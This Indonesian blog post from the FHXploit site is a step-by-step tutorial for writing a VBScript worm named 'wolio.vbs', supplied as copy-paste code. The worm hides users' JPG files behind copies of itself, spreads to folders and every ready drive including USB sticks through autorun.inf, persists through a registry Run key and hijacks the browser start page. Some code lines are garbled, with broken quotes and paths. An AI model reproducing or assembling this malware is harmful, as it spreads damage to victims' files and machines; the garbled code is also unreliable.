Selasa, 20 Februari 2018

Cara membuat Virus Worm menggunakan Virtual basic (VB)

virus komputer merupakan program komputer yang dapat menggandakan dirinya atau menyalin dirinya sendiri, virus juga dapat menyebar dengan menyisipkan dirinya ke dalam folder atau dokumen - dokumen di dalam komputer. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali. Virus yang akan kita coba buat kali ini akan dibuat dengan menggunakan Visual Basic Script.
baiklah berikut skenario virus yang sekarang akan kita buat :

1. virus akan mencari - cari file .JPG pada folder dan subfolder, setelah itu akan merubah format atau extensi .JPG menjadi .JPEG, dan merubah atributnya menjadi hidden files sehingga file pun akan tersembunyikan dan si user akan mengira filenya hilang.
2. menduplikasi diri atau menyalin dirinya ke dalam folder - folder tertentu dalam windows
3. memodifikasi registry agar secara otomatis menjalankan script virus saat komputer terestat
4. menularkan dirinya ke semua hardrive yang aktiv termasuk flashdisk
5. membuat halaman HTML tertentu agar di jalankan pada start page di internet explorer

demikian sekenario script virus yang akan kita buat, sekarang kita masuk ke tahapan pembuatan virus sebagai berikut :

Baca Juga

1. Bagian pertama adalah prosedur utuk mencari file - file .JPG dan merubahnya menjadi .JPEG sesuai skenario di atas

copy code di bawah ini :


Sub serangan_jpg(target)
on error resume next
set ftarget=fso.GetFile(target)
set fsource = fso.GetFile(Wscript.ScriptFullName)
ftarget.Copy(Left(target,instrrev(target,”.”)) & “jpeg”)
set fbackup = fso.GetFile(Left(target,instrrev(target,”.”)) & “jpeg”)
fbackup.Attributes = 2 fsource.Copy(Left(target,instrrev(target,”.”)) & “jpg ” & “.vbs”)
ftarget.Delete
ftarget.Close
fsource.Close
End Sub
Sub carifilejpg(folder)
For Each filetarget in fso.GetFolder(folder).Files
If (Right(filetarget,3)=”jpg”) then serangan_jpg(filetarget)
Next
End Sub



2. untuk prosedur selanjtnya kita akan membuat kode yang akan mencari semua drive yang aktiv termasuk flashdisk

copy code di bawah ini :


Sub serangan_drive()
Set fso = CreateObject(”Scripting.FileSystemObject”)
Set Drives=fso.drives
adaflashdisk = False
For Each drive in Drives
If drive.isready Then
fsource.Copy(drive & “” & “wolio.vbs”)
If drive.DriveType = 1 And drive.DriveLetter > “C:” Then adaflashdisk = True
End If
Next
If adaflashdisk = True Then
set fileautorun = fso.CreateTextFile(drive.DriveLetter & “” & “autorun.inf”,False)
fileautorun.WriteLine(”[AUTORUN]“)
fileautorun.WriteLine(”RUN=wolio.vbs”)
End If
End Sub


3. pada tahapan ini kita akan merubah registri agar startpage pada internet explorer menjalankan file HTML yang kita inginkan 

copy code di bawah ini :

Sub serangan_ie()
If (regedit.RegRead(”HKEY_CURRENT_USER\SOFTWARE\MicrosoftInternet Explorer\Main\Start
Page”)<>”c:\windows\system32\wolio.html”) Then
regedit.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start
Page”,”c:\windows\system32\wolio.html”
End If
End Sub



4. sekaran kita akan membuat sebuah script HTML yang akan menjalankan script virus 

copy code di bawah ini :


Sub buat_html()
set filehtml = fso.CreateTextFile(”c:windowssystem32wolio.html”,True)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
“)
filehtml.WriteLine(”Welcome to Wolio”)
filehtml.WriteLine(”filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(”Selamat Datang di Wolio VBS “)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
End Sub


 5. pada bagian ini kita akan mencari folder yang ada dan menularinya dengan script virus

copy code di bawah ini :

Sub serangan_folder(foldername)
on error resume next
For Each subfolder in fso.GetFolder(foldername).SubFolders
fsource.Copy(subfolder & “wolio.vbs”)
carifilejpg(subfolder)
next
End Sub


6.dan pada bagian ini adalah bagian terakhir yaitu bagian utama yang gunanya mendeklarasikan variabel dan memanggil semua prosedur yang telah kita buat tadi 

copy code di bawah :

On Error Resume Next
dim fso, fsource, ftarget, fbackup, scriptname, myfolder, subfolder, preview, filetarget, sys, regedit, drive,
filehtml, fileautorun
dim adaflashdisk
set fso = CreateObject(”Scripting.FileSystemObject”)
set fsource = fso.GetFile(Wscript.ScriptFullName)
set regedit=CreateObject(”WScript.Shell”)
myfolder = Left(fsource,InStrRev(fsource,””))
‘ Copy-kan diri ke “c:windowssystem32″
fsource.Copy(”c:windowssystem32wolio.vbs”)
‘ Cari dan infeksi file JPG didalam folder
carifilejpg(myfolder)
‘ Copy-kan diri di sub folder yang ada
serangan_folder(myfolder)
‘ Regitry
if
(regedit.RegRead(”HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\Version\Run\Wolio”)<>”c:\windows\system32\wolio.vbs”) Then
regedit.RegWrite
“HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\VersionRun\Wolio”,”c:\windows\system32\wolio.vbs”
End If
‘ Copy-kan diri ke semua drive aktif
serangan_drive()
‘ Buat file wolio.html
buat_html()
‘ Ubah Start Page di Internet Explorer
serangan_ie()


demikian postingan tentang cara membuat virus worm menggunakan bahasa Virtual Basic (VBS)
setelah kalian mempelajari teknik penyebaran virus dengan ekstensi .VBS  maka di harapkan agar berhati - hati dengan file yang berekstensi ini agar dapat melakukan pencegahannya. semoga bermanfaat jangan di persalah gunakan karna postingan ini semata untuk pemahaman dan pembelajaran, saya tidak akan bertanggung jawab atas apa yang terjadi setelah anda mempraktekannya. sekian dan sampai jumpa di postingan berikutnya...

Terima Kasih Telah mengunjungi Blog FHXploit Bantu kami mengembangkan Channel Youtube dengan Subscribe di Channel FHXploit. Dan Jangan lupa terus kunjungi www.fhxploit.Com untuk melihat Artikel lainnya.
Klik Untuk BerKomentar

0 komentar

Paling Populer

Entri yang Diunggulkan

Cara Connecting Wifi Lewat Cmd

Hallo fhxploit fams! Kembali lagi bertemu dengan saya di blog fhxploit. Pada kesempatan kali ini, sesuai judul yang sudah terlihat diatas.....